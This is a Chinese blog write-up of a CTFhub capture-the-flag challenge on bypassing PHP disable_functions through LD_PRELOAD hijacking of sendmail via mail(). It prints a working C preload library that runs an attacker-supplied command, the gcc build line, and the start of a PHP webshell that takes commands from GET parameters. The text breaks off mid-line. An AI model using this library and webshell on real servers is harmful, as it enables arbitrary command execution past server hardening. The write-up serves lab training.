CTFhub Bypass disable_function_蚁剑 bypass disable 插件-优快云博客

本文链接：https://blog.youkuaiyun.com/qq_64703089/article/details/141028669

LD_PRELOAD

题目中有小马，直接蚁剑连接

mail函数，就是发送邮件。
简单的来说，我们这里的利用方式，就是利用mail函数发送邮件时，会用系统程序/usr/sbin/sendmail，如果我们能劫持sendmail程序，再用mail函数来触发就能实现我们的目的了。

题目环境给了readflag文件，所以直接调用即可

编写C文件：

#define _GNU_SOURCE

#include <stdlib.h>
#include <stdio.h>
#include <string.h>


extern char** environ;

__attribute__ ((__constructor__)) void preload (void)
{
    // get command line options and arg
    const char* cmdline = getenv("EVIL_CMDLINE");

    // unset environment variable LD_PRELOAD.
    // unsetenv("LD_PRELOAD") no effect on some 
    // distribution (e.g., centos), I need crafty trick.
    int i;
    for (i = 0; environ[i]; ++i) {
            if (strstr(environ[i], "LD_PRELOAD")) {
                    environ[i][0] = '\0';
            }
    }

    // executive command
    system(cmdline);
}

Linux命令将c文件转换为so文件，并在tmp上传

gcc -shared -fPIC bypass_disablefunc.c -o bypass_disablefunc.so

在tmp再上传一个php文件

<?php
    echo "<p> <b>example</b>: http://site.com/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/var/www/bypass_disablefunc_x64.so </p>";

    $cmd = $_GET["cmd"];
    $out_path = $_GET["outpath"];
    $evil_cmdline = $cmd . " > " . $out_path . " 2>&1";
    echo "<p> <b>cmdline</b>: " . $evil